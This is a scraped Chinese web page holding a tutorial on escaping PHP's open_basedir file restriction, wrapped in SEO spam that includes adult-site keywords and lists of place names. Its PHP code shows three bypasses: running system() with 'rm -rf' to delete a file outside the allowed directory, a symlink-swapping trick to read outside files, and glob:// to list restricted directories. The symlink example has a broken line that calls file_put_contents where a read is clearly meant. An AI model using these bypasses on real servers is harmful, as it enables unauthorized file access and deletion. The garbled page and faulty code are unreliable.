婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > PHP繞過open_basedir限制操作文件的方法

PHP繞過open_basedir限制操作文件的方法

熱門標簽:拉薩打電話機器人 寶安400電話辦理 智能外呼電銷系統 沈陽人工智能電銷機器人公司 合肥外呼系統app 電銷機器人-快迭智能 高識別電銷機器人 h5 地圖標注 哈爾濱400電話辦理到易號網

0x00 預備知識

關于open_basedir

open_basedir是php.ini中的一個配置選項

它可將用戶訪問文件的活動范圍限制在指定的區域,

假設open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通過web1訪問服務器的用戶就無法獲取服務器上除了/home/wwwroot/home/web1/和/tmp/這兩個目錄以外的文件。

注意用open_basedir指定的限制實際上是前綴,而不是目錄名。

舉例來說: 若"open_basedir = /dir/user", 那么目錄 "/dir/user" 和 "/dir/user1"都是可以訪問的。所以如果要將訪問限制在僅為指定的目錄,請用斜線結束路徑名。

關于符號鏈接

符號鏈接又叫軟鏈接,是一類特殊的文件,這個文件包含了另一個文件的路徑名(絕對路徑或者相對路徑)。

路徑可以是任意文件或目錄,可以鏈接不同文件系統的文件。在對符號文件進行讀或寫操作的時候,系統會自動把該操作轉換為對源文件的操作,但刪除鏈接文件時,系統僅僅刪除鏈接文件,而不刪除源文件本身。

0x01 命令執行函數

由于open_basedir的設置對system等命令執行函數是無效的,所以我們可以使用命令執行函數來訪問限制目錄。

我們首先創建一個目錄

/home/puret/test/

且在該目錄下新建一個1.txt 內容為abc

nano 1.txt

再在該目錄下創建一個目錄命名為b

mkdir b

并且在該目錄下創建一個1.php文件內容為

?php
  echo file_get_contents("../1.txt");
?>

且在php.ini中設置好我們的open_basedir

open_basedir = /home/puret/test/b/

我們嘗試執行1.php看看open_basedir是否會限制我們的訪問

執行效果如圖

很明顯我們無法直接讀取open_basedir所規定以外的目錄文件。

接下來我們用system函數嘗試繞open_basedir的限制來刪除1.txt

編輯1.php為

?php
 system("rm -rf ../1.txt");
?>

先來看看執行1.php之前的文件情況

執行1.php之后

成功通過命令執行函數繞過open_basedir來刪除文件。
由于命令執行函數一般都會被限制在disable_function當中,所以我們需要尋找其他的途徑來繞過限制。

0x02 symlink()函數

我們先來了解一下symlink函數

bool symlink ( string $target , string $link )

symlink函數將建立一個指向target的名為link的符號鏈接,當然一般情況下這個target是受限于open_basedir的。
由于早期的symlink不支持windows,我的測試環境就放在Linux下了。

測試的PHP版本是5.3.0,其他的版本大家自測吧。

在Linux環境下我們可以通過symlink完成一些邏輯上的繞過導致可以跨目錄操作文件。

我們首先在/var/www/html/1.php中 編輯1.php的內容為

?php
  mkdir("c");
  chdir("c");
  mkdir("d");
  chdir("d");
  chdir("..");
  chdir("..");
  symlink("c/d","tmplink");
  symlink("tmplink/../../1.txt","exploit");
  unlink("tmplink");
  mkdir("tmplink");
  echo file_put_contents("http://127.0.0.1/exploit");
?>

接著在/var/www/中新建一個1.txt文件內容為

"abc"

再來設置一下我們的open_basedir

open_basedir = /var/www/html/

在html目錄下編輯一個php腳本檢驗一下open_basedir

?php
   file_get_contents("../1.txt");
?>

執行看下。

意料之中,文件無法訪問。

我們執行剛才寫好的腳本,1.php

可以看到成功讀取到了1.txt的文件內容,逃脫了open_basedir的限制

問題的關鍵就在于

symlink("tmplink/../../1.txt","exploit");

此時tmplink還是一個符號鏈接文件,它指向的路徑是c/d,因此exploit指向的路徑就變成了

c/d/../../1.txt

由于這個路徑在open_basedir的范圍之內所以exploit成功建立了。

之后我們刪除tmplink符號鏈接文件再新建一個同名為tmplink的文件夾,這時exploit所指向的路徑為

tmplink/../../

由于這時候tmplink變成了一個真實存在的文件夾所以tmplink/../../變成了1.txt所在的目錄即/var/www/

然后再通過訪問符號鏈接文件exploit即可直接讀取到1.txt的文件內容

當然,針對symlink()只需要將它放入disable_function即可解決問題,所以我們需要尋求更多的方法。

0x03 glob偽協議

glob是php自5.3.0版本起開始生效的一個用來篩選目錄的偽協議,由于它在篩選目錄時是不受open_basedir的制約的,所以我們可以利用它來繞過限制,我們新建一個目錄在/var/www/下命名為test

并且在/var/www/html/下新建t.php內容為

?php
  $a = "glob:///var/www/test/*.txt";
  if ( $b = opendir($a) ) {
    while ( ($file = readdir($b)) !== false ) {
      echo "filename:".$file."\n";
    }
    closedir($b);
  }
?>

執行結果如圖:

成功躲過open_basedir的限制讀取到了文件。

您可能感興趣的文章:
  • php利用ZipArchive類操作文件的實例
  • PHP操作文件的一些基本函數使用示例
  • PHP操作文件類的函數代碼(文件和文件夾創建,復制,移動和刪除)
  • PHP 操作文件的一些FAQ總結
  • PHP操作文件方法問答
  • 在PHP中操作文件的擴展屬性

標簽:山東 張家口 成都 巴中 梅州 林芝 威海 泰州

巨人網絡通訊聲明:本文標題《PHP繞過open_basedir限制操作文件的方法》,本文關鍵詞  PHP,繞過,open,basedir,限制,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《PHP繞過open_basedir限制操作文件的方法》相關的同類信息!
  • 本頁收集關于PHP繞過open_basedir限制操作文件的方法的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 大英县| 呼伦贝尔市| 神池县| 陇川县| 东乡县| 朝阳区| 荥阳市| 平定县| 临朐县| 遵义县| 杭锦旗| 普洱| 溧水县| 铜梁县| 京山县| 佳木斯市| 灯塔市| 农安县| 阜城县| 大港区| 贵溪市| 镇安县| 都兰县| 石阡县| 威远县| 蒲江县| 且末县| 收藏| 宜君县| 临海市| 周宁县| 石阡县| 绵阳市| 周至县| 平湖市| 封丘县| 上饶市| 郑州市| 玛纳斯县| 廊坊市| 友谊县|